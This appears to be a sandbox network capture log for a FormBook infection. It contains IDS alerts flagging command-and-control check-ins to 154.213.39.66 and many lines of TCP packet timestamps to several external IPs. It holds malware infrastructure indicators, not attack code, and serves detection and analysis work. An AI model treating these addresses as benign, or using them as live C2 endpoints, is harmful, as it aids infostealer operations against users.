                                                                                          2025-01-08T15:02:59.365461+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650015154.213.39.6680TCP
                                                                                          2025-01-08T15:03:02.605311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650016154.213.39.6680TCP
                                                                                          2025-01-08T15:03:04.648395+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650017154.213.39.6680TCP
                                                                                          Jan 8, 2025 14:59:54.737745047 CET8049971154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:54.737759113 CET8049971154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:54.737891912 CET4997180192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:55.366241932 CET4997180192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:56.385013103 CET4997980192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:56.688019037 CET8049979154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:56.688097954 CET4997980192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:56.702795982 CET4997980192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:56.707650900 CET8049979154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:56.707726955 CET8049979154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:57.587821007 CET8049979154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:57.587910891 CET8049979154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:57.587981939 CET4997980192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:58.210064888 CET4997980192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:59.228807926 CET4998080192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:59.233596087 CET8049980154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 14:59:59.233686924 CET4998080192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:59.242489100 CET4998080192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 14:59:59.247308969 CET8049980154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:00:00.156548023 CET8049980154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:00:00.156737089 CET8049980154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:00:00.156795025 CET4998080192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:00:00.159358978 CET4998080192.168.2.6154.213.39.66
                                                                                          Jan 8, 2025 15:00:00.164216995 CET8049980154.213.39.66192.168.2.6
                                                                                          Jan 8, 2025 15:00:05.184192896 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:05.189023018 CET804998147.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:05.189095020 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:05.203670979 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:05.208446026 CET804998147.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:06.710081100 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:06.834764957 CET804998147.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:06.834780931 CET804998147.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:06.834840059 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:06.834871054 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:06.835006952 CET804998147.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:06.835046053 CET4998180192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:07.728852987 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:07.735090971 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:07.735268116 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:07.749247074 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:07.754131079 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:09.257175922 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:09.574537039 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.178756952 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.233587980 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.233647108 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.233656883 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.233700037 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.233722925 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.233931065 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.233961105 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.233972073 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.234111071 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.234147072 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.234993935 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.235004902 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.235019922 CET804998247.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.235053062 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.235090017 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.235090017 CET4998280192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.275984049 CET4998380192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.280782938 CET804998347.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.280847073 CET4998380192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.295020103 CET4998380192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:10.299846888 CET804998347.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:10.299984932 CET804998347.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:11.803811073 CET4998380192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:11.856590986 CET804998347.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:11.886786938 CET804998347.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:11.886847973 CET4998380192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:12.823343039 CET4998480192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:12.877882957 CET804998447.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:12.877958059 CET4998480192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:12.887418985 CET4998480192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:12.892187119 CET804998447.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:14.452493906 CET804998447.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:14.452596903 CET804998447.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:14.452661037 CET4998480192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:14.455317974 CET4998480192.168.2.647.83.1.90
                                                                                          Jan 8, 2025 15:00:14.460104942 CET804998447.83.1.90192.168.2.6
                                                                                          Jan 8, 2025 15:00:19.478108883 CET4998580192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:19.483131886 CET8049985104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:19.483220100 CET4998580192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:19.497598886 CET4998580192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:19.502439022 CET8049985104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:20.489952087 CET8049985104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:20.489974022 CET8049985104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:20.489989042 CET8049985104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:20.490072012 CET4998580192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:20.490112066 CET4998580192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:21.106615067 CET4998580192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:22.119659901 CET4998680192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:22.124496937 CET8049986104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:22.124615908 CET4998680192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:22.138329983 CET4998680192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:22.143080950 CET8049986104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:23.116576910 CET8049986104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:23.116591930 CET8049986104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:23.116673946 CET4998680192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:23.116740942 CET8049986104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:23.116789103 CET4998680192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:23.647649050 CET4998680192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:24.666311026 CET4998780192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:24.671195984 CET8049987104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:24.671299934 CET4998780192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:24.685410023 CET4998780192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:24.690160990 CET8049987104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:24.690373898 CET8049987104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:25.668557882 CET8049987104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:25.668572903 CET8049987104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:25.668709993 CET4998780192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:25.669399023 CET8049987104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:25.669450045 CET4998780192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:26.194586039 CET4998780192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:27.213182926 CET4998880192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:27.218086958 CET8049988104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:27.218220949 CET4998880192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:27.226830959 CET4998880192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:27.231657028 CET8049988104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:28.199692011 CET8049988104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:28.199707985 CET8049988104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:28.199834108 CET4998880192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:28.200298071 CET8049988104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:28.200376034 CET4998880192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:28.203593969 CET4998880192.168.2.6104.21.53.168
                                                                                          Jan 8, 2025 15:00:28.208333015 CET8049988104.21.53.168192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.372313023 CET4998980192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:41.377187014 CET8049989199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.379259109 CET4998980192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:41.396032095 CET4998980192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:41.400906086 CET8049989199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.857542992 CET8049989199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.857562065 CET8049989199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.857618093 CET4998980192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:41.857880116 CET8049989199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:41.857949018 CET4998980192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:42.898098946 CET4998980192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:43.917088032 CET4999080192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:43.921991110 CET8049990199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:43.922065020 CET4999080192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:43.939471960 CET4999080192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:43.944293976 CET8049990199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:44.388211012 CET8049990199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:44.388228893 CET8049990199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:44.388283968 CET4999080192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:44.388370991 CET8049990199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:44.388416052 CET4999080192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:45.444668055 CET4999080192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:46.465378046 CET4999180192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:46.472974062 CET8049991199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:46.477272034 CET4999180192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:46.489474058 CET4999180192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:46.494828939 CET8049991199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:46.494993925 CET8049991199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:46.931845903 CET8049991199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:46.931864023 CET8049991199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:46.931909084 CET8049991199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:46.931952953 CET4999180192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:46.932034016 CET4999180192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:47.991426945 CET4999180192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:49.010116100 CET4999280192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:49.015008926 CET8049992199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:49.018207073 CET4999280192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:49.029521942 CET4999280192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:49.034356117 CET8049992199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:49.481997013 CET8049992199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:49.482013941 CET8049992199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:49.482026100 CET8049992199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:00:49.482146978 CET4999280192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:49.485433102 CET4999280192.168.2.6199.59.243.228
                                                                                          Jan 8, 2025 15:00:49.490187883 CET8049992199.59.243.228192.168.2.6
                                                                                          Jan 8, 2025 15:01:02.783627987 CET4999380192.168.2.6194.58.112.174
                                                                                          Jan 8, 2025 15:01:02.788414955 CET8049993194.58.112.174192.168.2.6
                                                                                          Jan 8, 2025 15:01:02.789469004 CET4999380192.168.2.6194.58.112.174
                                                                                          Jan 8, 2025 15:01:02.899338961 CET4999380192.168.2.6194.58.112.174
                                                                                          Jan 8, 2025 15:01:02.904203892 CET8049993194.58.112.174192.168.2.6
                                                                                          Jan 8, 2025 15:01:03.479429007 CET8049993194.58.112.174192.168.2.6
                                                                                          Jan 8, 2025 15:01:03.479451895 CET8049993194.58.112.174192.168.2.6
                                                                                          Jan 8, 2025 15:01:03.479465961 CET8049993194.58.112.174192.168.2.6
                                                                                          Jan 8, 2025 15:01:03.479479074 CET8049993194.58.112.174192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.671101093 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.752346039 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.752362013 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.752526999 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.872945070 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.872975111 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.872988939 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873001099 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873153925 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.873289108 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873300076 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873342991 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.873497009 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873508930 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873519897 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873555899 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.873563051 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.873622894 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.874155045 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.874166012 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.874177933 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.874209881 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.874231100 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.874243021 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.874278069 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.875056028 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.875067949 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.875089884 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.875099897 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.875102043 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.875113964 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.875143051 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.875170946 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.876035929 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.876049042 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.876063108 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.876091957 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.923904896 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.923919916 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.923980951 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.923994064 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.923993111 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.924006939 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.924118042 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:49.959892035 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.959909916 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:49.960072041 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.081497908 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081567049 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081579924 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081620932 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.081651926 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081664085 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081676960 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081687927 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081701994 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081707001 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.081813097 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.081984997 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.081996918 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.082035065 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.082151890 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.082171917 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.082242012 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.132249117 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.132261992 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.132273912 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.132396936 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.132411003 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.132421970 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.132425070 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.132476091 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.132487059 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.289778948 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289802074 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289817095 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289872885 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.289906979 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289920092 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289932966 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289943933 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289949894 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.289958000 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.289988041 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.290062904 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.290266991 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290278912 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290298939 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290309906 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290322065 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290332079 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.290333986 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290347099 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.290347099 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.290390015 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.291018009 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.291029930 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.291044950 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.291064024 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.291089058 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.340631008 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.340652943 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.340667009 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.340682030 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.340802908 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.340913057 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.340923071 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.340972900 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.498214960 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498233080 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498245955 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498258114 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498270988 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498289108 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498300076 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498326063 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498337030 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498348951 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498389959 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.498445988 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.498814106 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498826981 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498840094 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498883963 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.498914957 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498927116 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498938084 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498950005 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.498960018 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.498980999 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.499686956 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.499697924 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.499732018 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.554276943 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.809597969 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.809623957 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.809645891 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.809655905 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.809822083 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.809822083 CET5001380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 15:02:50.810002089 CET8050013192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 15:02:50.810777903 CET8050013192.186.58.31192.168.2.6
